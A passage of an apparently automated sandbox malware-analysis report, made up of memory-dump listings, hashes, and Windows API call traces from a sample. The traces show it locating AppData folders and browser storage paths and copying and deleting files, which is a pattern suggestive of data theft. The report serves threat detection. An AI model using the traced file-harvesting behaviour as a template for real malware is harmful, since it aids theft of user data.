                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a298751145c1879cd4e69cb3aaf5ee5705f77e84284544d1e7a89825fd7c00f4
                            • Instruction ID: 29fb4a2659f2f47b4b9cdbf3e2908dcefa5c90677618526c1b37e2ac77b55a16
                            • Opcode Fuzzy Hash: a298751145c1879cd4e69cb3aaf5ee5705f77e84284544d1e7a89825fd7c00f4
                            • Instruction Fuzzy Hash: 4C615AF3A186109BD3186E2CEC9577ABBDAEBD4320F1A893DE6C5D3784E53548048682
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1a9cdd5d8edcb5e5e2a6b45e3f07eb7557a09e0b42e2ca5b47fd65412e7ab66f
                            • Instruction ID: 2acf749efc67effb7303c7346eec7323dcccb7eedd9954933fba1e1031eb34db
                            • Opcode Fuzzy Hash: 1a9cdd5d8edcb5e5e2a6b45e3f07eb7557a09e0b42e2ca5b47fd65412e7ab66f
                            • Instruction Fuzzy Hash: FB513BF3E086140FF304A969EC4573AB3DAEBC4320F2A863DDE9997384E9791D0542D2
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d556b085cf1b0fbb24323d38697598546949a4f6cea66ca4d07d76460a07f2b4
                            • Instruction ID: ab9dc88fb7715f5eb76770a25ab9cca537c85115882384d3a798b0c9cd277ff4
                            • Opcode Fuzzy Hash: d556b085cf1b0fbb24323d38697598546949a4f6cea66ca4d07d76460a07f2b4
                            • Instruction Fuzzy Hash: C751E8B7A0C201EFE7089D39DD9577BB6A9E784320F35453EA283C7640EE759800B6D2
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: addb896656df1cd3e25956083d6c61c582401b72623977d9bbdd27d4141b1743
                            • Instruction ID: 381294e23ff31e7c39b1d22c6e96db5aba8d5527dbbf442dcbac418ed37b0a17
                            • Opcode Fuzzy Hash: addb896656df1cd3e25956083d6c61c582401b72623977d9bbdd27d4141b1743
                            • Instruction Fuzzy Hash: DE418CF3A052105FE300593EEC94BA7B79BEBD4710F5B863ADA8497785EC35580682D1
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00B18636
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1866D
                            • lstrcpy.KERNEL32(?,00000000), ref: 00B186AA
                            • StrStrA.SHLWAPI(?,0187EA50), ref: 00B186CF
                            • lstrcpyn.KERNEL32(00D393D0,?,00000000), ref: 00B186EE
                            • lstrlen.KERNEL32(?), ref: 00B18701
                            • wsprintfA.USER32 ref: 00B18711
                            • lstrcpy.KERNEL32(?,?), ref: 00B18727
                            • StrStrA.SHLWAPI(?,0187EA68), ref: 00B18754
                            • lstrcpy.KERNEL32(?,00D393D0), ref: 00B187B4
                            • StrStrA.SHLWAPI(?,0187EF30), ref: 00B187E1
                            • lstrcpyn.KERNEL32(00D393D0,?,00000000), ref: 00B18800
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 559ee86ac7d9317935b5deb7e4e377d4ff291d656565331553f93999b109d940
                            • Instruction ID: b6bc3c8804effe96d5851e2936de2f13c00ad1ca01c78924c0f0f96126ab73d4
                            • Opcode Fuzzy Hash: 559ee86ac7d9317935b5deb7e4e377d4ff291d656565331553f93999b109d940
                            • Instruction Fuzzy Hash: A8F17C72A01614AFCB10DB68DD58ADAB7B9EF88300F144599F90AE3350DF71AE45DBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01F9F
                            • lstrlen.KERNEL32(01878C38), ref: 00B01FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00B01FE3
                            • lstrlen.KERNEL32(00B31794), ref: 00B01FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0200E
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B02042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0204D
                            • lstrlen.KERNEL32(00B31794), ref: 00B02058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02075
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B02081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B020AC
                            • lstrlen.KERNEL32(?), ref: 00B020E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02104
                            • lstrcat.KERNEL32(00000000,?), ref: 00B02112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02139
                            • lstrlen.KERNEL32(00B31794), ref: 00B0214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0216B
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B02177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B021A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B021D4
                            • lstrlen.KERNEL32(?), ref: 00B021EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0220A
                            • lstrcat.KERNEL32(00000000,?), ref: 00B02218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02242
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0227F
                            • lstrlen.KERNEL32(0187D280), ref: 00B0228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B022B1
                            • lstrcat.KERNEL32(00000000,0187D280), ref: 00B022B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B022F7
                            • lstrcat.KERNEL32(00000000), ref: 00B02304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B02356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B023BF
                            • DeleteFileA.KERNEL32(00000000), ref: 00B023F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B02444
                            • FindClose.KERNEL32(00000000), ref: 00B02453
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: 56ee649f31ce64acc45e812c857f5aa165ebb5cc7e814b01287d06c009a4c028
                            • Instruction ID: 832760e2b8718d212d673a1b819e6540d20cb7242235c0e78aade8827b12c3e3
                            • Opcode Fuzzy Hash: 56ee649f31ce64acc45e812c857f5aa165ebb5cc7e814b01287d06c009a4c028
                            • Instruction Fuzzy Hash: 0BE11E71A117169BCB21EF68DD8DA9EBBF9EF44300F0444A4F805E7291DB74DD498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16445
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B16480
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B164AA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B164E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16506
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1650E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B16537
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: e8454c1817c5807e2671c9d81331f169cd773d1aff2f40ebee212e7d53938828
                            • Instruction ID: 4d8bff80b9f1e9da0a1ab66872ff14cc9191e13d4087a8a9b3fcfa93d513edf1
                            • Opcode Fuzzy Hash: e8454c1817c5807e2671c9d81331f169cd773d1aff2f40ebee212e7d53938828
                            • Instruction Fuzzy Hash: 0DF15D70A117169BCB21AF68D849AEEBBF5EF44300F4441B8F855D7291DB34DD8ACBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B143A3
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B143D6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B143FE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14409
                            • lstrlen.KERNEL32(\storage\default\), ref: 00B14414
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14431
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00B1443D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14466
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B14471
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14498
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B144D7
                            • lstrcat.KERNEL32(00000000,?), ref: 00B144DF
                            • lstrlen.KERNEL32(00B31794), ref: 00B144EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14507
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B14513
                            • lstrlen.KERNEL32(.metadata-v2), ref: 00B1451E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1453B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00B14547
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1456E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B145A0
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B145A7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14601
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1462A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14653
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1467B
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B146AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: 887103a168f9dfe69169513a21cec78a8b5d1e3135091494735809ba937c613e
                            • Instruction ID: 58938a2fef4305bb77b8421d40887eb632692f529e4be8b6737f85af46d2c47d
                            • Opcode Fuzzy Hash: 887103a168f9dfe69169513a21cec78a8b5d1e3135091494735809ba937c613e
                            • Instruction Fuzzy Hash: 85B18B30A117069BCB21EF78DD89AAE7BE9EF50300F5400B4B846E7291DF74DD498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B157D5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B15804
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15835
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1585D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B15868
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15890
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B158C8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B158D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B158F8
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1592E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15956
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B15961
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15988
                            • lstrlen.KERNEL32(00B31794), ref: 00B1599A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B159B9
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B159C5
                            • lstrlen.KERNEL32(0187D178), ref: 00B159D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B159F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B15A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15A2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15A58
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B15A5F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15AB7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15B2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15B56
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15B89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15BB5
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B15BEF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B15C4C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B15C70
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: 4fae6368759de1cebde94f767c4e8528a842764e93c9f2a5fc62d8b26dbdac22
                            • Instruction ID: f1539cf14f876315a81fcbc1a7a2a46eb1bf853ed8b0a0a790afcdcfb3bfcfc3
                            • Opcode Fuzzy Hash: 4fae6368759de1cebde94f767c4e8528a842764e93c9f2a5fc62d8b26dbdac22
                            • Instruction Fuzzy Hash: AC027171A11B05DBCB21EF68D8899EEBBF5EF84300F5441A8F845E7290DB74DD898B90
                            APIs
                              • Part of subcall function 00B01120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B01135
                              • Part of subcall function 00B01120: RtlAllocateHeap.NTDLL(00000000), ref: 00B0113C
